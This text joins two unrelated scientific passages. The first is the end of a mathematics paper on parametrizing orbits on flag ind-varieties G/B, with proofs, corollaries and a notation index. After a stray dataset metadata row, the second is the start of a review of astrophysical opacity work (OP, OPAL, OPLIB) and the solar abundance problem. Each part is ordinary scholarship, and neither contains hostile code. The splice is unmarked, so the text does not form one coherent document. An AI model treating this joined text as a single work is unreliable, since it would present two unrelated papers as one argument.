\mbox{$\underline{\hat{v}}$ is $(\hat{w},\hat{\varepsilon})$-conjugate (resp., dual)}.
\end{eqnarray*}
As in the proof of Proposition \ref{P4-1.1} we derive the equalities
\begin{equation}
\label{T-proof.2}
\bs{\mathcal{O}}_{(\hat{w},\hat{\varepsilon})}\cap X_{n}=\mathcal{O}_{(w,\varepsilon)}
\quad
\mbox{and}
\quad
\bs{\mathfrak{O}}_{(\hat{w},\hat{\varepsilon})}\cap X_{n}=\mathfrak{O}_{(w,\varepsilon)}
\end{equation}
where $\mathcal{O}_{(w,\varepsilon)},\mathfrak{O}_{(w,\varepsilon)}\subset X_{n}$ are as in Definition \ref{DA3}.
Parts {\rm (a)} and {\rm (c)} of Proposition \ref{P4.2-2} then follow
from Proposition \ref{P2}\,{\rm (a)} and {\rm (c)}.
\end{proof}
\begin{proof}[Proof of Proposition \ref{P4.3}]
Let $n\in\{n_1,n_2,\ldots\}$ (where $n_k=|J_1|+\ldots+|J_k|$ as before) and $(p_n,q_n)=(|N_+\cap\{1,\ldots,n\}|,|N_-\cap\{1,\ldots,n\}|)$
and let $\tau=\tau^{(n)}:\{1,\ldots,n\}\to\{1,\ldots,n\}$
be the permutation such that $\sigma(\tau_1)\prec\ldots\prec\sigma(\tau_n)$.
Since the generalized flag $\mathcal{F}_\sigma$ is $\omega$-isotropic,
we must have
\[\iota(\tau_\ell)=\tau_{n-\ell+1}\quad\mbox{for all $\ell\in\{1,\ldots,n\}$}.\]
This observation easily implies that the map $j_n$ defined in the proof
of Proposition \ref{P4.2-2}
restricts to a well-defined injective map
\[j_n:\mathfrak{I}^{\eta,\epsilon}_n(p_n,q_n)\to \mathfrak{I}^{\eta,\epsilon}_\infty(N_+,N_-)\]
such that
\[\mathfrak{I}^{\eta,\epsilon}_\infty(N_+,N_-)=\bigcup_{k\geq 1}
j_{n_k}(\mathfrak{I}^{\eta,\epsilon}_{n_k}(p_{n_k},q_{n_k})).\]
By (\ref{T-proof.2}) for $(\hat{w},\hat{\varepsilon})=j_n(w,\varepsilon)$ we get
\begin{equation}
\label{T-proof.3}
\bs{\mathcal{O}}^{\eta,\epsilon}_{(\hat{w},\hat{\varepsilon})}\cap (X_{n})_\omega=\mathcal{O}^{\eta,\epsilon}_{(w,\varepsilon)}
\quad
\mbox{and}
\quad
\bs{\mathfrak{O}}^{\eta,\epsilon}_{(\hat{w},\hat{\varepsilon})}\cap (X_{n})_\omega=\mathfrak{O}^{\eta,\epsilon}_{(w,\varepsilon)}.
\end{equation}
Proposition \ref{P4.3} easily follows from this fact and Proposition \ref{P3}.
\end{proof}
\section{Corollaries}
\label{S5}
We start by a corollary stating that the parametrization of $\mathbf{K}$- and $\mathbf{G}^0$-orbits on $\mathbf{G}/\mathbf{B}$ depends only on the triple $\left(\mathbf{G},\mathbf{K},\mathbf{G}^0\right)$ but not on the choice of the ind-variety $\mathbf{G}/\mathbf{B}$.
\begin{corollary}
\label{C1}
Let $E,\mathbf{G},\mathbf{K},\mathbf{G}^0$ be as in Section \ref{S2.1}.
Let $\mathcal{F}_{\sigma_j}$ ($j=1,2$) be two
$E$-compatible
maximal generalized flags, which are $\omega$-isotropic in types B,C,D,
and let $\mathbf{X}_j=\mathbf{G}/\mathbf{B}_{\mathcal{F}_{\sigma_j}}$.
Then there are natural bijections
\[
\mathbf{X}_1/\mathbf{K}\cong\mathbf{X}_2/\mathbf{K}
\quad\mbox{and}\quad
\mathbf{X}_1/\mathbf{G}^0\cong\mathbf{X}_2/\mathbf{G}^0
\]
which commute with the duality of Theorem \ref{theorem-1}.
\end{corollary}
Next, a straightforward counting of the parameters yields:
\begin{corollary}
\label{C2}
In Corollary \ref{C1}
the orbit sets $\mathbf{X}_j/\mathbf{K}$ and $\mathbf{X}_j/\mathbf{G}^0$
are always infinite.
\end{corollary}
It is important to note that, despite Corollary \ref{C1}, the topological properties of the orbits on $\mathbf{G}/\mathbf{B}$ are not the same for different choices of Borel ind-subgroups $\mathbf{B}\subset\mathbf{G}$. The following corollary establishes criteria for the existence of open and closed orbits on $\mathbf{G}/\mathbf{B}=\mathbf{X}\left(\mathcal{F}_\sigma,E\right)$.
\begin{corollary}
\label{C3}
Let $E,\mathbf{G},\mathbf{K},\mathbf{G}^0$ be as in Section \ref{S2.1},
and let $\mathcal{F}_\sigma$ be an $E$-compatible maximal generalized flag, $\omega$-isotropic in types B,C,D, where $\sigma:\mathbb{N}^*\to (A,\prec)$ is a bijection onto a totally ordered set.
Let $\mathbf{X}=\mathbf{G}/\mathbf{B}_{\mathcal{F}_\sigma}$; i.e., $\mathbf{X}=\mathbf{X}(\mathcal{F}_\sigma,E)$ in type A and $\mathbf{X}=\mathbf{X}_\omega(\mathcal{F}_\sigma,E)$ in types B,C,D.
\begin{itemize}
\item[\rm ($\mbox{a}_1$)] In type A1,
$\mathbf{X}$ has an open $\mathbf{K}$-orbit (equivalently, a closed $\mathbf{G}^0$-orbit) if and only if $\iota(\ell)=\ell$ for all $\ell\gg 1$ (i.e., if the matrix $\Omega$ of (\ref{omega}) contains finitely many diagonal blocks of size 2)
\item[\rm ($\mbox{a}_2$)]
In type A2, $\mathbf{X}$ has an open $\mathbf{K}$-orbit (equivalently, a closed $\mathbf{G}^0$-orbit) if and only if
for all $\ell\gg 1$ the elements
$\sigma(2\ell-1),\sigma(2\ell)$ are consecutive in $A$ and
the number $|\{k<2\ell-1:\sigma(k)\prec\sigma(2\ell-1)\}|$ is even.
\item[\rm ($\mbox{a}'_{12}$)]
In types A1 and A2,
$\mathbf{X}$ has at most one closed $\mathbf{K}$-orbit
(equivalently, at most one open $\mathbf{G}^0$-orbit). $\mathbf{X}$ has a closed $\mathbf{K}$-orbit (equivalently an open $\mathbf{G}^0$-orbit) if and only if $\mathbf{X}$ contains $\omega$-isotropic generalized flags. This latter condition is equivalent to the existence of an
involutive antiautomorphism of ordered sets $\iota_A:(A,\prec)\to(A,\prec)$ such that
$\iota_A\sigma(\ell)=\sigma\iota(\ell)$ for all $\ell\gg 1$.
\item[\rm ($\mbox{a}_3$)] In type A3,
$\mathbf{X}$ has always infinitely many closed $\mathbf{K}$-orbits (equivalently, infinitely many open $\mathbf{G}^0$-orbits).
$\mathbf{X}$ has an open $\mathbf{K}$-orbit (equivalently, a closed $\mathbf{G}^0$-orbit)
if and only if $d:=\min\{|N_+|,|N_-|\}<\infty$ and $\mathcal{F}_\sigma$
contains a $d$-dimensional and a $d$-codimensional subspace.
\item[\rm (bcd)] In types B,C,D,
$\mathbf{X}$ has always infinitely many closed $\mathbf{K}$-orbits (equivalently, open $\mathbf{G}^0$-orbits).
In types C1 and D3, $\mathbf{X}$ has never an open $\mathbf{K}$-orbit (equivalently, no closed $\mathbf{G}^0$-orbit).
In types BD1 and C2, $\mathbf{X}$ has an open $\mathbf{K}$-orbit (equivalently, a closed $\mathbf{G}^0$-orbit)
if and only if $d:=\min\{|N_+|,|N_-|\}<\infty$ and $\mathcal{F}_\sigma$ has a $d$-dimensional subspace (or equivalently it has a $d$-codimensional subspace).
\end{itemize}
\end{corollary}
\begin{proof}
This follows from Remarks \ref{R-open} and \ref{R-closed}, Propositions \ref{P4-1.1}, \ref{P4.2-2}, \ref{P4.3}, and relations (\ref{T-proof.1}), (\ref{T-proof.2}), (\ref{T-proof.3}).
\end{proof}
\begin{corollary}
The only situation where $\mathbf{X}$ has simultaneously open and closed $\mathbf{K}$-orbits (equivalently, open and closed $\mathbf{G}^0$-orbits) is in types
A3, BD1, C2, in the case where $d:=\min\{|N_+|,|N_-|\}<\infty$ and $\mathcal{F}_\sigma$
contains a $d$-dimensional and a $d$-codimensional subspace.
\end{corollary}
\section*{Index of notation}
\begin{itemize}
\item[\S\ref{S.intro}:] $\mathbb{N}^*$, $|A|$, $\mathfrak{S}_n$, $\mathfrak{S}_\infty$, $(k;\ell)$
\smallskip
\item[\S\ref{S2.1}:] $\mathbf{G}(E)$, $\mathbf{G}(E,\omega)$, $\Omega$, $\omega$, $\gamma$, $\Phi$, $\phi$, $\delta$
\smallskip
\item[\S\ref{S2.2}:] $\mathcal{F}(v_1,\ldots,v_n)$, $\mathbb{O}_w$
\smallskip
\item[\S\ref{S2.3}:] $\mathcal{F}_\sigma(\underline{v})$, $\mathcal{F}_\sigma$,
$\mathbf{P}_\mathcal{F}$, $\mathbf{B}_\mathcal{F}$, $\mathbf{X}(\mathcal{F},E)$, $(\pmb{\mathbb{O}}_{\tau,\sigma})_w$, $\mathbf{X}_\omega(\mathcal{F},E)$
\smallskip
\item[\S\ref{S3.1}:] $\mathcal{F}^\perp$, $\gamma(\mathcal{F})$, $\mathfrak{I}_n$, $\mathfrak{I}'_n$, $\mathcal{O}_w$, $\mathfrak{O}_w$
\smallskip
\item[\S\ref{S3.2}:] $\delta(\mathcal{F})$, $\mathcal{F}^\dag$, $\varsigma(\phi:\mathcal{F})$, $\varsigma(\delta:\mathcal{F})$, $\varsigma(w,\varepsilon)$, $\mathfrak{I}_n(p,q)$, $\mathcal{O}_{(w,\varepsilon)}$, $\mathfrak{O}_{(w,\varepsilon)}$
\smallskip
\item[\S\ref{S3.3}:] $\mathfrak{I}^{\eta,\epsilon}_n(p,q)$, $\mathcal{O}^{\eta,\epsilon}_{(w,\varepsilon)}$, $\mathfrak{O}^{\eta,\epsilon}_{(w,\varepsilon)}$
\smallskip
\item[\S\ref{S4.1}:] $\iota$, $\mathfrak{I}_\infty(\iota)$, $\mathfrak{I}'_\infty(\iota)$, $\bs{\mathcal{O}}_w$, $\bs{\mathfrak{O}}_w$, $(A^*,\prec^*)$, $\sigma^\perp$, $\mathbf{X}^\perp$, $\mathbf{X}^\gamma$, $\pmb{\mathbb{O}}_w^\perp$, $\pmb{\mathbb{O}}_w^\gamma$
\smallskip
\item[\S\ref{S4.2}:] $\mathfrak{I}_\infty(N_+,N_-)$, $\bs{\mathcal{O}}_{(w,\varepsilon)}$, $\bs{\mathfrak{O}}_{(w,\varepsilon)}$, $\sigma^\dag$, $\mathbf{X}^\dag$, $\pmb{\mathbb{O}}_w$, $\pmb{\mathbb{O}}_w^\dag$
\smallskip
\item[\S\ref{S4.3}:] $\mathfrak{I}_\infty^{\eta,\epsilon}(N_+,N_-)$, $\bs{\mathcal{O}}_{(w,\varepsilon)}^{\eta,\epsilon}$, $\bs{\mathfrak{O}}_{(w,\varepsilon)}^{\eta,\epsilon}$
\end{itemize}
| 2024-02-18T23:40:16.895Z | 2017-04-13T02:05:41.000Z | algebraic_stack_train_0000 | 1,924 | 22,381 |
|
proofpile-arXiv_065-9560 | \section{\label{intro} Introduction}
The {\em {Workshop on Astrophysical Opacities}} \cite{pis92} was held at the IBM Venezuela Scientific Center in Caracas during the week of 15 July 1991. Although this meeting included several leading researchers concerned with the computation of atomic and molecular opacities, it was a timely encounter between the two teams, namely the Opacity Project (OP) \footnote{http://cdsweb.u-strasbg.fr/topbase/TheOP.html} and OPAL \footnote{http://opalopacity.llnl.gov/opal.html}, that had addressed a 10-year-old plea~\cite{sim82} to revise the Los Alamos Astrophysical Opacity Library (LAAOL) \cite{cox76}. The mood at the time was jovial because, in spite of the contrasting quantum mechanical frameworks and equations of state implemented by the two groups and the ensuing big-data computations, the general level of agreement of the new Rosseland mean opacities (RMO) was outstanding.
Further refinements of the opacity data sets carried out the following decade, namely the inclusion of inner-shell contributions by the OP \cite{bad05}, led in fact to improved accord. However, a downward revision of the solar metal abundances in 2005 resulting from non-LTE 3D hydrodynamic simulations of the photosphere \cite{asp05} compromised very precise benchmarks in the standard solar model (SSM) with the helioseismic and neutrino-flux predictions \cite{bah05a, bah05b}. Since then things have never been the same.
Independent photospheric hydrodynamic simulations have essentially confirmed the lower metal abundances, specially of the volatiles (C, N, and O) \cite{caf11}. The opacity increases required to compensate for the abundance corrections have neither been completely matched in extensive revisions of the numerical methods, theoretical approximations, and transition inventories \cite{jin09, gil11, nah11, tur11, bla12, gil12, bus13, del13, gil13, tur13a, tur13b, tur13c, fon15, igl15a, mon15, pai15, pen15, kri16a, kri16b, nah16a, bla16, nah16b, tur16a}, nor in a new generation of opacity tables (OPLIB) \footnote{http://aphysics2.lanl.gov/opacity/lanl/} by Los Alamos \cite{col16}, nor even in recent innovative opacity experiments \cite{bai15}. Nonetheless, unexplainable disparities in the modeling of asteroseismic observations of hybrid B-type pulsators with OP and OPAL opacities seem to still question their definitive reliability \cite{das10}.
In the present report we give an overview of this ongoing multidisciplinary discussion, and within the context of the OP approach, analyze some of the theoretical shortcomings that could be impairing a more complete and accurate opacity accounting. In particular we discuss spectator-electron processes responsible for the broad and asymmetric resonances arising from core photoexcitation, K-shell resonance widths, and ionization edges since it has been recently shown that the solar opacity profile is sensitive to the Stark broadening of K lines \cite{kri16b}.
\section{\label{teams} OP and OPAL Projects}
In a plasma where local thermodynamic equilibrium (LTE) can be assumed, the specific radiative intensity $I_\nu$ is not very different from the Planck function $B_\nu(T)$ and the flux can be estimated by a diffusion approximation
\begin{equation}
\mathbf{F}=-\frac{4\pi}{3\kappa_R}\,\frac{{\rm d}B}{{\rm d}T}\nabla T
\end{equation}
with
\begin{equation}
\frac{{\rm d}B}{{\rm d}T}=\int_0^\infty \frac{\partial B_\nu}{\partial T}{\rm d}\nu
\end{equation}
and
\begin{equation}
\frac{1}{\kappa_R}=\left[\int_0^\infty \frac{1}{\kappa_\nu}\,\frac{\partial B_\nu}{\partial T}{\rm d}\nu\right]
\left[\frac{{\rm d}B}{{\rm d}T}\right]^{-1}\ .
\end{equation}
Radiative transfer is then essentially controlled by the {\it {Rosseland mean opacity}}
\begin{equation}
\frac{1}{\kappa_R}=\int_0^\infty \frac{1}{\kappa_u}\times g(u){\rm d}u\
\end{equation}
where the reduced photon energy is $u=h\nu/kT$ and the weighting function $g(u)$ is given by
\begin{equation}
g(u)=\frac{15}{4\pi^4}u^4\exp(-u)[1-\exp(-u)]^{-2}\ .
\end{equation}
The monochromatic opacity
\begin{equation}
\kappa_\nu= \kappa_\nu^{\rm bb}+\kappa_\nu^{\rm bf}+\kappa_\nu^{\rm ff}+\kappa_\nu^{\rm sc}
\end{equation}
includes contributions from all the bound--bound (bb), bound--free (bf), free--free(ff), and photon scattering (sc) processes in the plasma. This implies massive computations of atomic data, namely~energy levels (ground and excited), $f$-values, and photoionization cross sections for all the constituent ionic species of the plasma, and for a wide range of temperatures and densities, an~adequate equation of state to determine the ionization fractions and level populations in addition to the broadening mechanisms responsible for the line profiles.
\begin{figure}[h!]
\includegraphics[width=0.75\textwidth]{fig1.eps}
\caption{\label{atom} Multichannel ionic structure showing series of singly and doubly excited bound states and resonances and several continua.}
\end{figure}
\subsection{\label{methods} Numerical Methods}
In the computations of the vast atomic data required for opacity estimates---namely level energies, $f$-values, and photoionization cross sections---OP and OPAL used markedly different quantum-mechanical methods. The former adopted a multichannel framework based on the close-coupling expansion of scattering theory \cite{ber87}, where the $\Psi(SL\pi)$ wave function of an ($N+1$)-electron system is expanded in terms of the $N$-electron $\chi_i$ core eigenfunctions
\begin{equation}
\label{cc}
\Psi(SL\pi) = \sum_i \chi_i\theta_i + \sum_j c_j\Phi_j(SL\pi)\ .
\end{equation}
The second term in Equation~(\ref{cc}) is a configuration-interaction (CI) expansion built up from core orbitals to account for orthogonality conditions and to improve short-term correlations. Core~orbitals were generated with standard CI atomic structure codes such as SUPERSTRUCTURE \cite{eis74} and CIV3~\cite{hib75}, and the total system wave functions and radiative data were computed with the $R$-matrix method \cite{bur71, ber95} including extensive developments in the asymptotic region specially tailored for the project \cite{sea86}. The latter allowed the treatment of both the discrete and continuum spectra for an ionic species in a unified manner (see Figure~\ref{atom}), its effectiveness depending on the accuracy and completeness of the core eigenfunction expansion in Equation~(\ref{cc}), particularly at the several level crossings that take place along an isoelectronic sequence as the atomic number $Z$ increases.
The OPAL code, on the other hand, relied on parametric potentials that generated radiative data of accuracy comparable to single-configuration, self-consistent-field, relativistic schemes \cite{rog88, igl92}. The~parent (i.e., core) configuration defines a Yukawa-type potential
\begin{equation}
\label{param}
V=-\frac{2}{r}\left((Z-v)+\sum_{n=1}^{n_{\rm max}}N_n\exp(-\alpha_n r)\right)
\end{equation}
with $v=\sum_{n=1}^{n_{\rm max}}N_n$ for all the subshells and scattering states available to the active electron. In~Equation~(\ref{param}), $N_n$ is the number of electrons in the shell with principal quantum number $n$, $n_{\rm max}$~being the maximum value in the parent configuration, and $\alpha_n$ are $n$-shell screening parameters determined from matches of solutions of the Dirac equation with spectroscopic one-electron, configuration-averaged ionization energies. Thus, in this approach the atomic data were computed on the fly as required rather than relying on stored files (as in OP) that might prove inadequate in certain plasma conditions.
\subsection{Equation of State}
The formalisms of the equation of state implemented by OP and OPAL were also significantly different. In the OP the chemical picture was emphasized \cite{hum88, mih92}, where clusters (i.e., atoms or ions) of fundamental particles can be identified and the partition function of the canonical ensemble is factorizable. Thermodynamic equilibrium occurs when the Helmholtz free energy reaches a minimum for variations of the ion densities, and the internal partition function for an ionic species $s$ can then be~written as
\begin{equation}
Z_s = \sum_iw_{is}\,g_{is}\exp(-E_{is}/kT)\
\end{equation}
where $g_{is}$ and $w_{is}$ are respectively the statistical weight and occupation probability of the $i$th level. The~main problem was then the estimate of the latter, which was performed assuming a nearest-neighbor approximation for the ion microfield or by means of distribution functions that included plasma correlation~effects.
The OPAL equation of state was based on many-body activity expansions of the grand canonical partition function that avoided Helmholtz free-energy compartmentalization \cite{rog92}. Since pure Coulomb interactions between the electrons and nuclei are assumed, the divergence of the partition function does not take place; thus, there is no need to consider explicitly the plasma screening effects on the bound states.
\subsection{Revised Opacities}
\label{revop}
When compared to the LAAOL (see Figure~\ref{opal}), preliminary OPAL iron monochromatic opacities at density $\rho= 6.82\times 10^{-5}$~g\,cm$^{-3}$ and temperature $T=20$~eV indicated large enhancements at photon energies around 60~eV \cite{igl87}. They are due to an $n=3\rightarrow 3$ unresolved transition array that significantly enhances the Rosseland mean since its weighting function peaks at around 80~eV. Within the OP $R$-matrix approach, such transitions were computationally intractable at the time, and were then treated for the systems Fe~{\sc viii} to Fe~{\sc xiii} in a simpler CI approach (i.e., second term of Equation~(\ref{cc})) with the SUPERSTRUCTURE atomic structure code \cite{lyn95}. The dominance of this $\Delta n$ unresolved transition array in Fe was subsequently verified by laboratory photoabsorption measurements \cite{das92}.
\begin{figure}[h!]
\includegraphics[width=0.9\textwidth]{fig2.eps}
\caption{\label{opal} Monochromatic Fe opacities at $\rho= 6.82\times 10^{-5}$~g\,cm$^{-3}$ and $T=20$~eV. \textit{Left panel}: LAAOL. \textit{Right panel}: OPAL. Reproduced from Figures~1 and 2 of \cite{igl87} with permission of the $^\copyright$AAS and the Lawrence Livermore National Laboratory.}
\end{figure}
It was later pointed out that, in spite of general satisfactory agreement, the larger differences between the OPAL and OP opacities were at high temperatures and densities due to missing inner-shell contributions in OP \cite{igl95}. Hence, the latter were systematically included in a similar CI approach with the AUTOSTRUCTURE code in what became a major updating of the OP data sets \cite{bad03, sea04, bad05} illustrated in Figure~\ref{s92}~(left) for the solar S92 mix. After this effort and as shown in Figure~\ref{s92}~(right), the OPAL and OP opacities were thought to be in good working order, and it was actually mentioned that they could not be differentiated in stellar pulsation calculations \cite{kan94}.
\begin{figure}[h]
\includegraphics[width=0.45\textwidth]{fig3a.eps}
\includegraphics[width=0.45\textwidth]{fig3b.eps}
\caption{\label{s92} {\it Left}: Inner-shell contributions to the Rosseland-mean opacities for the S92 mix. {\it Right}: The OP and OPAL Rosseland-mean opacities for the S92 mix. Note: $R=\rho/T^3_6$ where $\rho$ is the mass density in g\,cm$^{-3}$ and $T_6=10^{-6}\times T$ with $T$ in K. Reproduced from Figures~1 and 2 of Ref.~\cite{bad05}.}
\end{figure}
\subsection{Big-Data Science}
\label{bigdata}
The OP was a pioneering example of what is now called collaborative big-data science \cite{hey09}. It~involved the computation of large data sets by several internationally distributed research groups, which were then compiled and stringently curated before becoming part of what eventually became TOPbase \cite{cun92, cun93}, one of the first online atomic databases. In order to ensure machine independence, its~database management system was completely developed from scratch in standard Fortran-77, and~its user interface rapidly evolved from command-based to web-browser-based. Furthermore, TOPbase was housed right from the outset in a {\em {data center}}, namely the Centre de Donn\'ees astronomiques de Strasbourg (CDS) \footnote{http://cdsweb.u-strasbg.fr/}, also a seminal initiative at the time.
Regarding the dissemination of monochromatic and mean opacities for arbitrary chemical mixes, the OP also implemented the innovative concept of a {\em {web service}}, namely the OPserver \cite{men07}, accessible~online from the Ohio Supercomputer Center \footnote{https://www.osc.edu/}. Since the main overhead in the calculation of mean opacities or radiative accelerations is the time taken to read large data volumes from secondary storage (disk), the OPserver always keeps the bulk of the monochromatic opacities in main memory (RAM) waiting for a service call from a web portal or the modeling code of a remote user; furthermore,~the~OPserver can also be downloaded (data and software) to be installed locally in a workstation. Its current implementation and performance are tuned up to streamline stellar structure or evolution modeling requiring mean opacities for varying chemical mixtures at every radial point or time interval.
\section{\label{SAP} Solar Abundance Problem}
\subsection{Standard Solar Model}
In 2005 there was much expectation in the solar modeling community for the OP inner-shell opacity update (see Section~\ref{revop}) as the very precise and much coveted benchmarks of the SSM with the helioseismic indicators---namely the radius of the convection zone boundary (CZB), He surface abundance, and the sound-speed profile---had been seriously disrupted by a downward revision of the photospheric metal abundances \cite{asp05}. This was was the result of advanced 3D hydrodynamic simulations that took into account granulation and non-LTE effects \cite{bah05a,bah05b}. In this regard, the final improved agreement between the OP and OPAL mean opacities after the aforementioned update turned out to be a disappointment in the SSM community.
\begin{table}[h]
\caption{\label{abund} Standard solar model (SSM) benchmarks (BS05 model from \cite{bah05b}) with the helioseismic predictions \cite{bas04}, namely the depth of the CZB ($R_\mathrm{cz}/R_\mathrm{sun}$) and He surface mass fraction ($Y_\mathrm{sur}$), using OP and OPAL opacities and the standard (GS98) \cite{gre98} and revised (AGS05) \cite{asp05} metal abundances.}
\begin{ruledtabular}
\begin{tabular}{ccc}
Model & $R_\mathrm{cz}/R_\mathrm{sun}$ & $Y_\mathrm{sur}$ \\
\colrule
BS05(GS98,OPAL) & 0.715 & 0.244 \\
BS05(GS98,OP) & 0.714 & 0.243 \\
BS05(AGS05,OPAL) & 0.729 & 0.230 \\
BS05(AGS05,OP) & 0.728 & 0.229 \\
Helioseismology & 0.713(1) & 0.249(3) \\
\end{tabular}
\end{ruledtabular}
\end{table}
This situation can be appreciated in Table~\ref{abund}, where the SSM benchmarks with the helioseismic measurements of the CZB and He surface mass fraction are hardly modified by the opacity choice (OPAL or OP), while the new abundances \cite{asp05} lead to noticeable modifications. It is further characterized by the SSM discrepancies with the helioseismic sound-speed profile near the CZB (see Figure~\ref{soundvel}), which~has been shown to disappear with an opacity increase of $\sim 30\%$ in this region down to a few percent in the solar core \cite{chr09}.
\begin{figure}[h!]
\includegraphics[width=0.7\textwidth]{fig4.eps}
\caption{\label{soundvel} Relative sound-speed differences between helioseismic measurements and SSM using the standard solar composition \cite{gre98} (open circles) and the revised metal abundances \cite{asp05} (filled circles). Reproduced from Figure~1 of \cite{chr09} with permission of $^\copyright$ESO.}
\end{figure}
\subsection{Seismic Solar Model}
The sound-speed profile in the solar core has also been useful, in what is referred to as the seismic solar model (SeSM) \cite{tur16b}, to verify the reliability of the highly temperature-dependent (and~thus opacity-dependent) nuclear reaction rates in reproducing the observed solar neutrino fluxes. In other words, both the helioseismic indicators and neutrino fluxes impose fairly strict constraints on the opacities and metal abundances (both of volatile and refractory elements) at different solar radii. For~instance, in spite of improved accord with the helioseismic CZB depth and sound speed, the higher metallicity recently derived from {in situ} measurements of the solar wind \cite{ste16} (see Table~\ref{abund2}) has been seriously questioned \cite{ser16a, vag17a, vag17b} because of a neutrino overproduction caused by the refractory excess (i.e., from Mg, Si, S, and Fe). In Table~\ref{abund2}, a more recent revision of the photospheric metallicity~\cite{asp09} is also tabulated that is $\sim$10\% higher but still $\sim$25\% lower than the previously assumed standard \cite{gre98}, and which has been independently confirmed by a similar 3D hydrodynamic approach \cite{caf11}. It has been shown \cite{ser09} that, with the more recent abundances of \cite{asp09}, the required opacity increase in the SSM to restore the helioseismic benchmarks is only now around $15\%$ at the CZB and $5\%$ in the core, i.e., half of what was previously estimated \cite{chr09}.
\begin{table}[h]
\caption{\label{abund2} Solar abundances ($\log\epsilon_i\equiv\log N_i/N_{\rm H}+12$). GS98: \cite{gre98}. AGS05: \cite{asp05}. AGSS09: \cite{asp09}. CLSFB11: \cite{caf11}. SZ16: \cite{ste16}.}
\begin{ruledtabular}
\begin{tabular}{cccccc}
$i$ & GS98 & AGS05 & AGSS09 & CLSFB11 & SZ16\\
\colrule
C & 8.52 & $8.39(5)$ & $8.43(5)$ & $8.50(6)$ & $8.65(8)$ \\
N & 7.92 & $7.78(6)$ & $7.83(5)$ & $7.86(12)$ & $7.97(8)$ \\
O & 8.83 & $8.66(5)$ & $8.69(5)$ & $8.76(7)$ & $8.82(11)$ \\
Ne & 8.08 & $7.84(6)$ & $7.93(10)$ & & $7.79(8)$ \\
Mg & 7.58 & $7.53(9)$ & $7.60(4)$ & & $7.85(8)$ \\
Si & 7.56 & $7.51(4)$ & $7.51(3)$ & & $7.82(8)$ \\
S & 7.20 & $7.14(5)$ & $7.12(3)$ & $7.16(5)$ & $7.56(8)$ \\
Fe & 7.50 & $7.45(5)$ & $7.50(4)$ & $7.52(6)$ & $7.73(8)$ \\
\colrule
$Z/X$ & 0.0229 & 0.0165 & 0.0181 & 0.0209 & 0.0265 \\
\end{tabular}
\end{ruledtabular}
\end{table}
\subsection{Multidisciplinary Approach}
Consensus has been reached in a multidisciplinary community encompassing sophisticated research fields (see Figure~\ref{sap}), for which the reliability of computed and measured of opacities is a key concern, that there is at present a solar abundance problem. This critical situation is encouraging further developments and discussions that, in a similar manner to the solar neutrino problem, are~expected to converge soon to a comprehensive solution. For instance, since the SSM is basically a static representation, there has been renewed interest in considering magnetic and dynamical effects such as rotation, elemental diffusion, and mixing and convection overshoot \cite{ser16b, tur16b}. Nuclear fusion cross sections have also been critically evaluated pinpointing cases for which the current precision could be improved \cite{ade11}.
\begin{figure}[t!]
\includegraphics[width=0.70\textwidth]{fig5.eps}
\caption{\label{sap} Research fields of the multidisciplinary community involved in the solar abundance problem.}
\end{figure}
Helioseismology has become a powerful diagnostic technique; for instance, it remarkably enables the performance evaluation of the different equations of state \cite{vor13}, and with the advent of the {\em Kepler}
\footnote{http://kepler.nasa.gov/} and {\em CoRoT} \footnote{http://bit.ly/2cYJ09w} space probes, it has been successfully applied to other stellar structures and evolutionary models in what is rapidly becoming a new well-established research endeavor: asteroseismology \cite{cha13}. In this regard, it has been curiously shown that, in the complex asteroseismology of some hybrid B-type pulsators (e.g., $\gamma$~Pegasi), both OPAL and OP opacity tables perform satisfactorily \cite{wal10}, but in others ($\nu$~Eridani) inconsistencies appear in the analysis that still seem to indicate missing opacity \cite{das10}, a point that is treated to some extent in Sections~\ref{op}--\ref{lre}.
\section{\label{op} Atomic Opacities, Recent Developments}
In a similar way to other research areas of Figure~\ref{sap}, the solar abundance problem has stimulated detailed revisions and new developments of the astrophysical opacity tables and the difficult laboratory reproduction of the plasma conditions at the base of the solar convection zone to obtain comparable~measurements.
The OPAC international consortium \cite{gil12, gil13} has been carrying out extensive comparisons using a battery of opacity codes (SCO, CASSANDRA, STA, OPAS, LEDCOP, OP, and SCO-RCG), looking~into the importance of configuration interaction and accounting mainly in elements of the iron-group bump ($Z$~bump), i.e., Cr, Fe, and Ni, due to their relevance in the pulsation of intermediate-mass stars. In this respect, the magnitude of the Fe and Ni contributions to the $Z$-bump and the temperature at which they occur have been shown to be critical in p- and g-mode pulsations in cool subdwarf B stars \cite{jef06a, jef06b}. Problems with both the OPAL and OP tables have been reported; for instance, there are considerable differences in the OPAS and OP single-element monochromatic opacities even though the OPAS RMO $\kappa_{\rm R}$ for the solar mixture by \cite{gre98} agree to within 5\% with both OPAL and OP for the entire radiative zone of the Sun ($0.0\leq r/R_\odot\leq 0.713$) \cite{bla12}. The larger $\kappa_{\rm R}^{\rm OPAS}/\kappa_{\rm R}^{\rm OP}$ ratios are found in Mg ($-44\%$), Fe~($+40\%$), and Ni ($+47\%$) due to variations in the ionic fractions (particularly for the lower charge states), missing configurations in OP, and the pressure broadening of the K$\alpha$ line in the He-like systems.
A new generation of Los Alamos opacity tables (OPLIB) including elements with atomic number $Z\leq 30$ have been computed with the ATOMIC code and made publicly available \cite{col16}. They have been used to study the $Z$~bump, finding reasonable agreement with transmission measurements in the XUV but factors of difference with the OP RMO tables for Fe and Ni \cite{tur16a}. Additionally, relativistic opacities for Fe and Ni computed with the Los Alamos codes are found to be in good agreement with semi-relativistic versions bolstering confidence in their numerical methods \cite{fon15}.
Solar models have been recently computed with both the OPLIB and OPAL opacity tables and the metal abundances of \cite{asp09}, finding only small differences in the helioseismic indicators although the OPLIB data display steeper opacity derivatives at the temperatures and densities associated with the solar interior \cite{guz16}. These opacity derivatives directly impact stellar pulsation properties such as the driving frequency, and since the latter data set has also been shown to yield a higher RMO than OPAL and OP in the $Z$-bump region, it
gives rise to wider B-type-pulsator instability domains \cite{wal15}. However,~basic~pulsating star problems remain unsolved such as the pulsations of the B-type stars in the Large and Small Magellanic Clouds. Moreover, in a recent analysis of the oscillation spectrum of $\nu$~Eridani with different opacity tables, OPLIB is to be preferred over OPAL and OP, but the observed frequency ranges can only be modeled with substantially modified mean-opacity profiles (an increase of a factor of 3 or larger at $\log(T)=5.47$ to ensure g-mode instability and a reduction of 65\% at $\log(T) = 5.06$ to match the empirical $f$ non-adiabatic parameters) that are nevertheless impaired by puzzling side effects: enhanced convection efficiency in the $Z$ bump affecting mode instability and avoided-crossing effects in radial modes \cite{das17}.
